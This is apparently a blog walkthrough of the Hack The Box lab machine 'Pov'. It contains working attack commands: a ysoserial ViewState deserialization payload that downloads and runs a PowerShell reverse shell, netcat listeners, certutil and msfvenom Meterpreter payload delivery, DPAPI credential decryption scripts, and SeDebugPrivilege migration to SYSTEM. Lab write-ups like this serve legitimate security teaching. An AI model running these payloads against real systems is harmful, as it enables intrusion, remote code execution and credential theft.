Hack The Box - Pov

08 May 2024 . tech
#tutorial

Reconnaissance and Initial Steps

Nmap

sudo nmap -Pn -A 10.10.11.251

echo "10.10.11.251 pov.htb" | sudo tee -a /etc/hosts

Visiting port 80 turned up nothing of interest apart from a reference to the dev subdomain.

Directory Brute Force

dirsearch -u http://pov.htb/ 

Subdomain Fuzz

Using ffuf, we check whether any other subdomains exist for pov.htb by fuzzing the Host header (virtual-host discovery); -ac filters out the default response.

ffuf -c -ac -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.pov.htb' -u http://pov.htb

Only dev comes back, so let's add it to /etc/hosts.

echo "10.10.11.251 dev.pov.htb" | sudo tee -a /etc/hosts

There is a download button on this page.

Start the Burp Suite proxy with Intercept on, then click the Download CV button.

In the request we see the parameter file=cv.pdf. The download handler takes that name and serves the file from disk, so we can try a more sensitive one, such as /web.config, and resend the request. The server answers with a file named web.config: this is an arbitrary file read, and web.config is the first file to pull because it holds the application's configuration and, as it turns out here, its machineKey.

<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
  </system.web>
    <system.webServer>
        <httpErrors>
            <remove statusCode="403" subStatusCode="-1" />
            <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
        </httpErrors>
        <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
    </system.webServer>
</configuration>

After some searching I found this HackTricks article: https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter

ViewState is the base64 blob that ASP.NET Web Forms puts in the hidden __VIEWSTATE field to round-trip page state, and the server deserializes it on every postback. It is protected by an HMAC computed with validationKey (here SHA1) and optionally encrypted with decryptionKey (here AES). Those are exactly the two keys that leaked in web.config: with them an attacker can serialize a gadget chain (ysoserial.net's TextFormattingRunProperties), sign and encrypt it so the server accepts it as its own, and have it deserialized for Remote Code Execution (RCE). The plan: get ysoserial.exe, write a PowerShell reverse shell, generate a ViewState payload with the leaked keys and the page path, host the script, and submit the payload in __VIEWSTATE. Step by step:

  1. Get ysoserial.exe from https://github.com/NHPT/ysoserial.net/releases onto a Windows VM (it is a .NET tool).
  2. Go to https://www.revshells.com/, generate a PowerShell reverse shell that connects back to your Kali IP on port 6666, and save it on the Kali machine as rev.ps1.
  3. Fill in the keys from web.config and generate the payload with ysoserial.exe (10.10.16.31 is the Kali tun0 address used throughout this write-up; --path is the page the form posts to):
    ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio/default.aspx" -c "powershell.exe iex (iwr http://10.10.16.31:8000/rev.ps1 -UseBasicParsing)"

  4. Back on Kali, open two terminals: one serving rev.ps1 over HTTP, the other a netcat listener for the shell.

Terminal 1:

python3 -m http.server 8000

Terminal 2:

nc -nlvp 6666

  5. Browse to http://dev.pov.htb, click Download CV and capture the request in Burp Suite.
  6. Replace the value of the __VIEWSTATE parameter with the ysoserial output and send the request. The server deserializes the payload, the embedded command downloads and runs rev.ps1, and the listener receives a shell.

We land in a shell as sfitz. The Documents folder contains an interesting file, connection.xml: a PSCredential object exported with Export-Clixml that holds the password of the user alaading.

PS C:\Users\sfitz\Documents> type connection.xml

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">  
  <Obj RefId="0">  
    <TN RefId="0">  
      <T>System.Management.Automation.PSCredential</T>  
      <T>System.Object</T>  
    </TN>  
    <ToString>System.Management.Automation.PSCredential</ToString>  
    <Props>  
      <S N="UserName">alaading</S>  
      <SS N="Password"><!-- DPAPI-protected SecureString blob omitted --></SS>  
    </Props>  
  </Obj>  
</Objs>

Let's decrypt this password. The <SS> element is a SecureString that Export-Clixml protected with DPAPI under sfitz's user key, so it can only be turned back into plaintext from a session running as sfitz on this host (copying the file to Kali will not help); Import-Clixml, or ConvertTo-SecureString followed by GetNetworkCredential(), does the job. See this article for the background: https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx
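Doing the decryption on the box, as an added example that is not from the write-up (the two function names are mine): run it from the sfitz shell with connection.xml in the current directory. The first function does what the linked article describes with Import-Clixml; the second covers the case where only the raw <SS> string was recovered (for example through the file-read bug) but a session as the exporting user is available.

```powershell
# Added example, not from the original write-up. Run as sfitz on the target with
# connection.xml in the current directory.
# The <SS> value is a SecureString protected with DPAPI in user scope, so only the
# user who exported it, on the same machine, can decrypt it. Any other context
# typically fails with "Key not valid for use in specified state".

function Get-ClixmlPassword {
    param([string]$Path = '.\connection.xml')
    try {
        $cred = Import-Clixml -Path $Path      # rebuilds the PSCredential object
    } catch {
        throw "Import-Clixml failed ($($_.Exception.Message)); are you the user who exported it, on the same host?"
    }
    [pscustomobject]@{
        UserName = $cred.UserName
        Password = $cred.GetNetworkCredential().Password   # DPAPI-decrypts the SecureString
    }
}

function Convert-ProtectedStringToPlain {
    param([Parameter(Mandatory)][string]$Protected)   # the hex blob from <SS>
    # No -Key argument: ConvertTo-SecureString uses the DPAPI user-scoped format
    # that Export-Clixml wrote, so the same user/host restriction applies.
    $secure = ConvertTo-SecureString -String $Protected
    $bstr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure)
    try     { [Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr) }
    finally { [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr) }   # do not leave the plaintext in memory
}

# usage from the sfitz shell:
Get-ClixmlPassword
# Convert-ProtectedStringToPlain -Protected '<hex from the SS element>'
```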

User Flag

I use RunasCs to get a shell as alaading. RunasCs is a utility to run a process with explicit credentials, i.e. with permissions different from those of the current logon.

I downloaded RunasCs to my Kali VM, unzipped it and placed it in the directory served by the python3 HTTP server.

https://github.com/antonioCoco/RunasCs/releases

┌──(kali㉿kali)-[~]
└─$ ls
rev.ps1 RunasCs.exe
python3 -m http.server 8000

On the Kali machine, create a netcat listener on port 5555:

nc -nlvp 5555

Then, on the victim, fetch RunasCs.exe from the Kali HTTP server and run it with alaading's credentials; -r sends the new process's input and output to our listener:

.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.16.31:5555

We got the user flag.

Root Flag

Looking at the token privileges (whoami /priv), alaading holds SeDebugPrivilege. That privilege lets a process open any other process, including winlogon.exe, which runs as SYSTEM, so we can migrate into it and inherit its token.

(One open question: why does the PowerShell spawned by RunasCs have SeDebugPrivilege while cmd does not?)

Switch to a Meterpreter shell to make process migration easy (the binary can be pulled over from the cmd shell with the built-in certutil.exe). Note the PID of winlogon.exe from the process list; it is needed later for the migration.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.31 LPORT=6666 -f exe > shell.exe

Start the reverse TCP handler on port 6666 (stop the earlier netcat listener on that port first):

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.31
set lport 6666
run

We serve shell.exe from the python3 HTTP server on Kali and download it on the victim with certutil.exe:

python3 -m http.server 8000

certutil.exe -urlcache -split -f http://10.10.16.31:8000/shell.exe shell.exe

Now run shell.exe on the target. The handler catches the Meterpreter session; from it, migrate into the winlogon.exe PID noted earlier, which runs as SYSTEM.
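Before migrating, it is worth confirming what the token actually holds and which PID to target. The following is an added example, not from the write-up (the function names are mine), meant to be run in the alaading shell on the target: it parses whoami /priv for SeDebugPrivilege and looks up winlogon.exe. A privilege reported as Disabled is still in the token and the process can enable it for itself (Meterpreter does this when it migrates, or with getprivs); only Absent means a different logon or token is needed.

```powershell
# Added example, not from the original write-up. Run in the alaading shell on the target.

function Get-PrivilegeState {
    param([string]$Name = 'SeDebugPrivilege')
    # whoami /priv prints one line per privilege: <name> <description> <Enabled|Disabled>
    $line = whoami /priv | Where-Object { $_ -match "^\s*$Name\s" }
    if (-not $line) { return 'Absent' }              # not in the token at all
    if ($line -match '\bEnabled\s*$') { 'Enabled' } else { 'Disabled' }
}

function Get-WinlogonPid {
    # winlogon.exe runs as SYSTEM in each interactive session. SeDebugPrivilege is
    # what lets a non-SYSTEM process open it with full access for migration.
    Get-Process -Name winlogon | Select-Object -First 1 -ExpandProperty Id
}

$state = Get-PrivilegeState
"SeDebugPrivilege: $state"
switch ($state) {
    'Absent' { 'token has no SeDebugPrivilege: migration into a SYSTEM process will fail from here' }
    default  { "migrate into winlogon.exe PID $(Get-WinlogonPid) from the Meterpreter session" }
}
```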

Me

c0d3cr4f73r is a cybersecurity enthusiast with a passion for red teaming and malware analysis. Based in Dubai, c0d3cr4f73r has extensive experience in offensive security operations. In their free time, they enjoy diving into the latest cybersecurity challenges.